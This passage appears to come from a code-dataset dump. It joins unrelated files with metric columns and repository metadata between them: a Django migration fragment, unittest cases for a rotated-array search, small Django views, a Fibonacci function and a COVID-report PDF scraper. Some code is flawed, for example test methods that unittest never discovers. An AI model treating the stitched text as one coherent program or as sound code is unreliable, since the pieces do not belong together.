('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=55)),
('beschreibung', models.TextField(blank=True, default='')),
('preis', models.FloatField()),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
migrations.CreateModel(
name='Besucher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('vorname', models.CharField(max_length=45)),
('nachname', models.CharField(max_length=45)),
('email', models.EmailField(blank=True, max_length=254, null=True)),
('telefon', phonenumber_field.modelfields.PhoneNumberField(blank=True, max_length=128, null=True, region=None)),
('strasse', models.CharField(max_length=45)),
('hausnummer', models.CharField(max_length=5)),
('plz', models.CharField(max_length=45)),
('stadt', models.CharField(max_length=45)),
('besucht_am', models.DateTimeField(auto_now_add=True, null=True)),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
migrations.CreateModel(
name='AlkoholhaltigeDrinks',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=55)),
('centiliter', models.FloatField()),
('beschreibung', models.TextField(blank=True, default='')),
('preis', models.FloatField()),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
migrations.CreateModel(
name='AlkoholfreieDrinks',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=55)),
('liter', models.FloatField()),
('beschreibung', models.TextField(blank=True, default='')),
('preis', models.FloatField()),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
]
| 48
| 128
| 0.567491
| 449
| 4,608
| 5.701559
| 0.195991
| 0.049219
| 0.084375
| 0.1125
| 0.771484
| 0.720703
| 0.720703
| 0.720703
| 0.720703
| 0.720703
| 0
| 0.014449
| 0.27908
| 4,608
| 95
| 129
| 48.505263
| 0.756171
| 0.009766
| 0
| 0.681818
| 1
| 0
| 0.09647
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034091
| 0
| 0.079545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2f3f7fbb2e9c92a49ae40445269e03dc87f8856d
| 185
|
py
|
Python
|
tsai/data/basics.py
|
radi-cho/tsai
|
32f24d55ee58df1a14d1e68618f230097a266c77
|
[
"Apache-2.0"
] | 1
|
2022-01-02T18:21:27.000Z
|
2022-01-02T18:21:27.000Z
|
tsai/data/basics.py
|
radi-cho/tsai
|
32f24d55ee58df1a14d1e68618f230097a266c77
|
[
"Apache-2.0"
] | 31
|
2021-12-01T23:08:51.000Z
|
2021-12-29T02:59:49.000Z
|
tsai/data/basics.py
|
radi-cho/tsai
|
32f24d55ee58df1a14d1e68618f230097a266c77
|
[
"Apache-2.0"
] | 1
|
2022-03-13T16:47:04.000Z
|
2022-03-13T16:47:04.000Z
|
from .validation import *
from .preparation import *
from .external import *
from .core import *
from .preprocessing import *
from .transforms import *
from .mixed_augmentation import *
| 26.428571
| 33
| 0.778378
| 22
| 185
| 6.5
| 0.454545
| 0.41958
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145946
| 185
| 7
| 33
| 26.428571
| 0.905063
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2f59b443158d106a76a2bebe88570da44bbc0fe9
| 5,838
|
py
|
Python
|
tests/tests_rotated_array_search.py
|
quervernetzt/find-value-in-rotated-sorted-array
|
b391b1502fd326a57973621500e984bf6f7df44a
|
[
"MIT"
] | null | null | null |
tests/tests_rotated_array_search.py
|
quervernetzt/find-value-in-rotated-sorted-array
|
b391b1502fd326a57973621500e984bf6f7df44a
|
[
"MIT"
] | null | null | null |
tests/tests_rotated_array_search.py
|
quervernetzt/find-value-in-rotated-sorted-array
|
b391b1502fd326a57973621500e984bf6f7df44a
|
[
"MIT"
] | null | null | null |
import unittest
from solution.rotated_array_search import RotatedArraySearch
class TestCasesRotatedArraySearch(unittest.TestCase):
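    # NOTE: unittest discovery only runs methods whose names start with "test",
    # so none of the cases below execute under "python -m unittest" as named.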
def input_list_is_none_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = None
target: int = 1
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_is_empty_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = []
target: int = 1
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_has_one_element_nonmatching_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [2]
target: int = 1
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_has_one_element_matching_return_zero(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [2]
target: int = 2
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, 0)
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
def input_list_with_multiple_elements_no_pivot_nonmatching_even_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [1,4,5,8,23,50]
target: int = 15
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_with_multiple_elements_no_pivot_matching_even_return_index(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [1,4,5,8,23,50]
target: int = 23
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, 4)
def input_list_with_multiple_elements_no_pivot_nonmatching_odd_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [1,4,5,8,23,50,51]
target: int = 15
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_with_multiple_elements_no_pivot_matching_odd_return_index(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [1,4,5,8,23,50,51]
target: int = 23
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, 4)
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
def input_list_with_multiple_elements_pivot_nonmatching_even_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [6,8,23,50,-10,-8,0,1,4,5]
target: int = 15
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_with_multiple_elements_pivot_matching_even_return_index(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [6,8,23,50,-10,-8,0,1,4,5]
target: int = 1
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, 7)
def input_list_with_multiple_elements_pivot_nonmatching_odd_return_minus_one(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [6,8,23,50,-10,-8,0,1,4]
target: int = 15
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, -1)
def input_list_with_multiple_elements_pivot_matching_odd_return_index(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list: list = [6,8,23,50,-10,-8,0,1,4]
target: int = 1
# Act
index: int = rotated_array_search.main(input_list, target)
# Assert
self.assertEqual(index, 7)
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
def input_list_with_multiple_elements_pivot_matching_edge_cases_return_index(self: object) -> None:
# Arrange
rotated_array_search: RotatedArraySearch = RotatedArraySearch()
input_list_0: list = [-8,0,1,4,6,8,23,50,-10]
input_list_1: list = [50,-10,-8,0,1,4,6,8,23]
target: int = 1
# Act
index_0: int = rotated_array_search.main(input_list_0, target)
index_1: int = rotated_array_search.main(input_list_1, target)
# Assert
self.assertEqual(index_0, 2)
self.assertEqual(index_1, 4)
| 33.94186
| 107
| 0.601918
| 655
| 5,838
| 5.045802
| 0.087023
| 0.111649
| 0.152496
| 0.088956
| 0.92708
| 0.920424
| 0.908926
| 0.88351
| 0.881089
| 0.870197
| 0
| 0.034623
| 0.243063
| 5,838
| 172
| 108
| 33.94186
| 0.713284
| 0.11408
| 0
| 0.690476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.154762
| false
| 0
| 0.02381
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2f8e310bf9e77d36d1ba6cf080e2e966d1ebdb66
| 63
|
py
|
Python
|
gira_homeserver_api/devices/value_device.py
|
leoyn/gira-homeserver-api
|
7d642413a56078f694518d9189b4b7cc9776482d
|
[
"MIT"
] | 5
|
2020-03-17T12:45:50.000Z
|
2022-03-07T10:55:50.000Z
|
gira_homeserver_api/devices/value_device.py
|
leoyn/gira-homeserver-api
|
7d642413a56078f694518d9189b4b7cc9776482d
|
[
"MIT"
] | 3
|
2020-04-17T09:53:45.000Z
|
2021-01-25T22:14:14.000Z
|
gira_homeserver_api/devices/value_device.py
|
leoyn/gira-homeserver-api
|
7d642413a56078f694518d9189b4b7cc9776482d
|
[
"MIT"
] | 1
|
2020-04-17T06:51:50.000Z
|
2020-04-17T06:51:50.000Z
|
from .device import Device
class ValueDevice(Device):
pass
| 15.75
| 26
| 0.761905
| 8
| 63
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174603
| 63
| 4
| 27
| 15.75
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
85f0ac57ac9d5511f94d39253027463025311137
| 194
|
py
|
Python
|
tests/api/utils/test_config.py
|
Devansh3712/py-cmc
|
e3f9687914d92cd95bd5a7c04e6103345ba43a3d
|
[
"MIT"
] | 2
|
2022-02-14T07:13:12.000Z
|
2022-02-14T07:20:34.000Z
|
tests/api/utils/test_config.py
|
Devansh3712/py-cmc
|
e3f9687914d92cd95bd5a7c04e6103345ba43a3d
|
[
"MIT"
] | 6
|
2022-02-21T10:50:43.000Z
|
2022-03-03T15:44:09.000Z
|
tests/api/utils/test_config.py
|
Devansh3712/py-cmc
|
e3f9687914d92cd95bd5a7c04e6103345ba43a3d
|
[
"MIT"
] | 2
|
2022-02-20T01:43:35.000Z
|
2022-03-13T09:34:51.000Z
|
from api.utils.config import settings
def test_config_validation() -> None:
assert type(settings.host) == str
assert type(settings.port) == int
assert type(settings.expire) == int
| 24.25
| 39
| 0.71134
| 26
| 194
| 5.230769
| 0.653846
| 0.220588
| 0.397059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175258
| 194
| 7
| 40
| 27.714286
| 0.85
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| true
| 0
| 0.2
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c83ceb2eaee488074f590ced585bdeba5d992e16
| 589
|
py
|
Python
|
main/views.py
|
climsoft/climsoftweb
|
3be127b3c8ce0e1f89940139ea19e17d20abe386
|
[
"BSD-3-Clause"
] | 1
|
2021-08-17T07:43:18.000Z
|
2021-08-17T07:43:18.000Z
|
main/views.py
|
climsoft/climsoftweb
|
3be127b3c8ce0e1f89940139ea19e17d20abe386
|
[
"BSD-3-Clause"
] | 45
|
2019-11-16T16:59:04.000Z
|
2021-04-08T21:23:48.000Z
|
main/views.py
|
climsoft/climsoftweb
|
3be127b3c8ce0e1f89940139ea19e17d20abe386
|
[
"BSD-3-Clause"
] | null | null | null |
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
@login_required
def mainmenu(request):
return render(request, 'main/mainmenu.html', {})
@login_required
def user_admin(request):
return render(request, 'main/user_admin.html', {})
@login_required
def user_profile(request):
return render(request, 'main/user_profile.html', {})
@login_required
def change_password(request):
return render(request, 'main/change_password.html', {})
@login_required
def language(request):
return render(request, 'main/language.html', {})
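The five views above differ only in the template they render; a hedged consolidation sketch using Django's class-based views (the class name is hypothetical):
from django.contrib.auth.mixins import LoginRequiredMixin
from django.views.generic import TemplateView

class MainMenuView(LoginRequiredMixin, TemplateView):
    # one subclass per page; only template_name changes
    template_name = 'main/mainmenu.html'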
| 21.814815
| 59
| 0.752122
| 74
| 589
| 5.824324
| 0.297297
| 0.180974
| 0.185615
| 0.301624
| 0.477958
| 0.157773
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122241
| 589
| 26
| 60
| 22.653846
| 0.833656
| 0
| 0
| 0.294118
| 0
| 0
| 0.174873
| 0.079796
| 0
| 0
| 0
| 0
| 0
| 1
| 0.294118
| false
| 0.117647
| 0.117647
| 0.294118
| 0.705882
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
c859d195756534de10c20a9266677539c86f42d2
| 72
|
py
|
Python
|
small-problems/fibonacci-sequence/fib1.py
|
Prateek2506/classic-cs-problems
|
fa0e3c86fb7cd478888bb90006f7379cc6c7a38b
|
[
"MIT"
] | null | null | null |
small-problems/fibonacci-sequence/fib1.py
|
Prateek2506/classic-cs-problems
|
fa0e3c86fb7cd478888bb90006f7379cc6c7a38b
|
[
"MIT"
] | null | null | null |
small-problems/fibonacci-sequence/fib1.py
|
Prateek2506/classic-cs-problems
|
fa0e3c86fb7cd478888bb90006f7379cc6c7a38b
|
[
"MIT"
] | null | null | null |
def fib1(n: int) -> int:
    if n < 2:  # base case; the original had none, so every call recursed forever
        return n
    return fib1(n-1) + fib1(n-2)
print(fib1(5))
| 24
| 32
| 0.583333
| 15
| 72
| 2.8
| 0.6
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118644
| 0.180556
| 72
| 3
| 33
| 24
| 0.59322
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
c091621b5f0a091f64683171c4c8e2bb52a88c66
| 155
|
py
|
Python
|
lambda_handlers/validators/__init__.py
|
renovate-tests/lambda-handlers
|
0b14013f19b597524a8d50f7ea8813ee726c584c
|
[
"Apache-2.0"
] | null | null | null |
lambda_handlers/validators/__init__.py
|
renovate-tests/lambda-handlers
|
0b14013f19b597524a8d50f7ea8813ee726c584c
|
[
"Apache-2.0"
] | null | null | null |
lambda_handlers/validators/__init__.py
|
renovate-tests/lambda-handlers
|
0b14013f19b597524a8d50f7ea8813ee726c584c
|
[
"Apache-2.0"
] | null | null | null |
from .jsonschema_validator import JSONSchemaValidator as jsonschema # noqa
from .marshmallow_validator import MarshmallowValidator as marshmallow # noqa
| 51.666667
| 78
| 0.858065
| 16
| 155
| 8.1875
| 0.5625
| 0.229008
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116129
| 155
| 2
| 79
| 77.5
| 0.956204
| 0.058065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c0c65039eac0d1c182008b9f53dbb8727df88022
| 151
|
py
|
Python
|
home/views.py
|
kerol/kerolgaodotcom
|
7993bb5f40dd1f6b3ebdef4d90728cd77651c026
|
[
"BSD-3-Clause"
] | 1
|
2016-03-02T02:49:00.000Z
|
2016-03-02T02:49:00.000Z
|
home/views.py
|
kerol/kerolgaodotcom
|
7993bb5f40dd1f6b3ebdef4d90728cd77651c026
|
[
"BSD-3-Clause"
] | null | null | null |
home/views.py
|
kerol/kerolgaodotcom
|
7993bb5f40dd1f6b3ebdef4d90728cd77651c026
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf8 -*-
from django.shortcuts import render
# Create your views here.
def index(request):
return render(request, 'about.html')
| 15.1
| 40
| 0.682119
| 19
| 151
| 5.421053
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00813
| 0.18543
| 151
| 9
| 41
| 16.777778
| 0.829268
| 0.298013
| 0
| 0
| 0
| 0
| 0.098039
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
f19cbc9fa4b054f10523c99c5ea25ef1f89616fb
| 26
|
py
|
Python
|
port/boost/__init__.py
|
happyxianyu/fxpkg
|
6d69f410474e71518cc8c6291892dd069c357c75
|
[
"Apache-2.0"
] | null | null | null |
port/boost/__init__.py
|
happyxianyu/fxpkg
|
6d69f410474e71518cc8c6291892dd069c357c75
|
[
"Apache-2.0"
] | null | null | null |
port/boost/__init__.py
|
happyxianyu/fxpkg
|
6d69f410474e71518cc8c6291892dd069c357c75
|
[
"Apache-2.0"
] | null | null | null |
from .main import MainPort
| 26
| 26
| 0.846154
| 4
| 26
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 1
| 26
| 26
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f1b716086bee59aea60d9505833a19bb60e79bc5
| 161
|
py
|
Python
|
smart_note_diploma/core/urls.py
|
yerkebulan19971212/dipploma
|
d274088aa477dadd7971950b80ef9ea3ea366a6b
|
[
"MIT"
] | null | null | null |
smart_note_diploma/core/urls.py
|
yerkebulan19971212/dipploma
|
d274088aa477dadd7971950b80ef9ea3ea366a6b
|
[
"MIT"
] | null | null | null |
smart_note_diploma/core/urls.py
|
yerkebulan19971212/dipploma
|
d274088aa477dadd7971950b80ef9ea3ea366a6b
|
[
"MIT"
] | null | null | null |
from django.urls import path
from .api.view import get_all_countries_view
app_name = "core"
urlpatterns = [
path('all-countries', get_all_countries_view)
]
| 20.125
| 49
| 0.770186
| 24
| 161
| 4.875
| 0.583333
| 0.307692
| 0.25641
| 0.324786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136646
| 161
| 7
| 50
| 23
| 0.841727
| 0
| 0
| 0
| 0
| 0
| 0.10559
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
7b2f67783a54c7281fccbf52bb33f6fc8f65fc62
| 482
|
py
|
Python
|
tests/individual_samples/long_doc.py
|
MiWeiss/docstr_coverage
|
502ab0174ea261383f497af2476317d4cc199665
|
[
"MIT"
] | 50
|
2019-01-25T16:53:39.000Z
|
2022-03-17T22:02:06.000Z
|
tests/individual_samples/long_doc.py
|
HunterMcGushion/docstr_coverage
|
502ab0174ea261383f497af2476317d4cc199665
|
[
"MIT"
] | 66
|
2019-01-25T11:45:43.000Z
|
2022-03-30T11:55:47.000Z
|
tests/individual_samples/long_doc.py
|
MiWeiss/docstr_coverage
|
502ab0174ea261383f497af2476317d4cc199665
|
[
"MIT"
] | 23
|
2019-01-28T08:37:42.000Z
|
2021-06-16T12:35:27.000Z
|
"""
this is a very long docstring
this is a very long docstring
this is a very long docstring
this is a very long docstring
this is a very long docstring
this is a very long docstring
this is a very long docstring
this is a very long docstring
this is a very long docstring
"""
class A:
"""This is the first class in the alphabeth."""
# docstr-coverage:excused `test ignore after long docstrings`
def ignored(self):
pass
def missing(self):
pass
| 20.083333
| 65
| 0.707469
| 80
| 482
| 4.2625
| 0.2875
| 0.175953
| 0.184751
| 0.290323
| 0.633431
| 0.633431
| 0.633431
| 0.633431
| 0.633431
| 0.633431
| 0
| 0
| 0.240664
| 482
| 23
| 66
| 20.956522
| 0.931694
| 0.773859
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.4
| 0
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
9e5f866f7cec9044c5ffc4636fdb2a689ffe67a2
| 3,221
|
py
|
Python
|
src/pdfDownloader.py
|
dna33/covid19-pdfocr
|
66f11fc7eb3d4f0146d04344a112578bc3149a02
|
[
"MIT"
] | 1
|
2021-08-16T22:21:30.000Z
|
2021-08-16T22:21:30.000Z
|
src/pdfDownloader.py
|
dna33/covid19-pdfocr
|
66f11fc7eb3d4f0146d04344a112578bc3149a02
|
[
"MIT"
] | null | null | null |
src/pdfDownloader.py
|
dna33/covid19-pdfocr
|
66f11fc7eb3d4f0146d04344a112578bc3149a02
|
[
"MIT"
] | null | null | null |
import urllib3
from bs4 import BeautifulSoup
import shutil
import re
import os
def obtenerReporteDiario(reporte_url, path):
req = urllib3.PoolManager()
res = req.request('GET', reporte_url)
soup = BeautifulSoup(res.data, features="html.parser")
pdfs = []
for link_soup in soup.find_all('a'):
link = str(link_soup.get('href'))
regex_pdf = re.compile(r"(reporte_covid19)[\w\-]*\.pdf", re.IGNORECASE)
pdf_match = re.search(regex_pdf, link)
if pdf_match:
pdf_file = f'{path}{os.path.basename(link)}'
if not os.path.isfile(pdf_file):
with req.request('GET', link, preload_content=False) as res, open(pdf_file, 'wb') as pfopen:
shutil.copyfileobj(res, pfopen)
pdfs.append(os.path.basename(link))
else:
print(pdf_file + ' already downloaded ')
return pdfs
def obtenerInformeEpidemiologico(reporte_url, path):
req = urllib3.PoolManager()
res = req.request('GET', reporte_url)
soup = BeautifulSoup(res.data, features="html.parser")
pdfs = []
for link_soup in soup.find_all('a'):
link = str(link_soup.get('href'))
#regex_pdf = re.compile(r"(informe|reporte)[\w\-]*\.pdf", re.IGNORECASE)
regex_pdf = re.compile(r"(epi|ep_)[\w\-]*\.pdf", re.IGNORECASE)
pdf_match = re.search(regex_pdf, link)
if pdf_match:
pdf_file = f'{path}{os.path.basename(link)}'
if not os.path.isfile(pdf_file):
print('Downloading ' + pdf_file)
with req.request('GET', link, preload_content=False) as res, open(pdf_file, 'wb') as pfopen:
shutil.copyfileobj(res, pfopen)
pdfs.append(os.path.basename(link))
else:
print(pdf_file + ' already downloaded ')
return pdfs
def obtenerSituacionCOVID19(reporte_url, path):
req = urllib3.PoolManager()
res = req.request('GET', reporte_url)
soup = BeautifulSoup(res.data, features="html.parser")
pdfs = []
for link_soup in soup.find_all('a'):
link = str(link_soup.get('href'))
regex_pdf = re.compile(r"(informe|reporte)[\w\-]*\.pdf", re.IGNORECASE)
pdf_match = re.search(regex_pdf, link)
if pdf_match:
pdf_file = f'{path}{os.path.basename(link)}'
if not os.path.isfile(pdf_file):
print('Downloading ' + pdf_file)
with req.request('GET', link, preload_content=False) as res, open(pdf_file, 'wb') as pfopen:
shutil.copyfileobj(res, pfopen)
pdfs.append(os.path.basename(link))
else:
print(pdf_file + ' already downloaded ')
return pdfs
if __name__ == '__main__':
#https://www.minsal.cl/nuevo-coronavirus-2019-ncov/informe-epidemiologico-covid-19/
obtenerInformeEpidemiologico('https://www.gob.cl/coronavirus/cifrasoficiales/', '../input/InformeEpidemiologico/')
obtenerReporteDiario('https://www.gob.cl/coronavirus/cifrasoficiales/', '../input/ReporteDiario/')
obtenerSituacionCOVID19('http://epi.minsal.cl/informes-covid-19/', '../input/InformeSituacionCOVID19/')
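The three downloaders above are identical except for the filename regex; a hedged consolidation sketch (the helper name obtenerPDFs is hypothetical):
def obtenerPDFs(reporte_url, path, patron):
    # 'patron' is the filename pattern that varies per report type, e.g. r"(epi|ep_)[\w\-]*\.pdf"
    req = urllib3.PoolManager()
    res = req.request('GET', reporte_url)
    soup = BeautifulSoup(res.data, features="html.parser")
    regex_pdf = re.compile(patron, re.IGNORECASE)
    pdfs = []
    for link_soup in soup.find_all('a'):
        link = str(link_soup.get('href'))
        if re.search(regex_pdf, link):
            pdf_file = f'{path}{os.path.basename(link)}'
            if not os.path.isfile(pdf_file):
                print('Downloading ' + pdf_file)
                with req.request('GET', link, preload_content=False) as res, open(pdf_file, 'wb') as pfopen:
                    shutil.copyfileobj(res, pfopen)
                pdfs.append(os.path.basename(link))
            else:
                print(pdf_file + ' already downloaded ')
    return pdfs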
| 39.765432
| 118
| 0.616889
| 392
| 3,221
| 4.928571
| 0.227041
| 0.050725
| 0.040373
| 0.055901
| 0.792443
| 0.783126
| 0.783126
| 0.737578
| 0.737578
| 0.737578
| 0
| 0.00861
| 0.242782
| 3,221
| 80
| 119
| 40.2625
| 0.783518
| 0.047501
| 0
| 0.769231
| 0
| 0
| 0.180365
| 0.083496
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046154
| false
| 0
| 0.076923
| 0
| 0.169231
| 0.076923
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7ba983a2c839be1dfa3a88ffa4c32747f568686e
| 2,123
|
py
|
Python
|
tests/test_inflate.py
|
FilipKlaesson/cops
|
67d2e5dd4534b3f3eec95b6cfda9d4c9c1746ef0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_inflate.py
|
FilipKlaesson/cops
|
67d2e5dd4534b3f3eec95b6cfda9d4c9c1746ef0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_inflate.py
|
FilipKlaesson/cops
|
67d2e5dd4534b3f3eec95b6cfda9d4c9c1746ef0
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from cops.graph import Graph
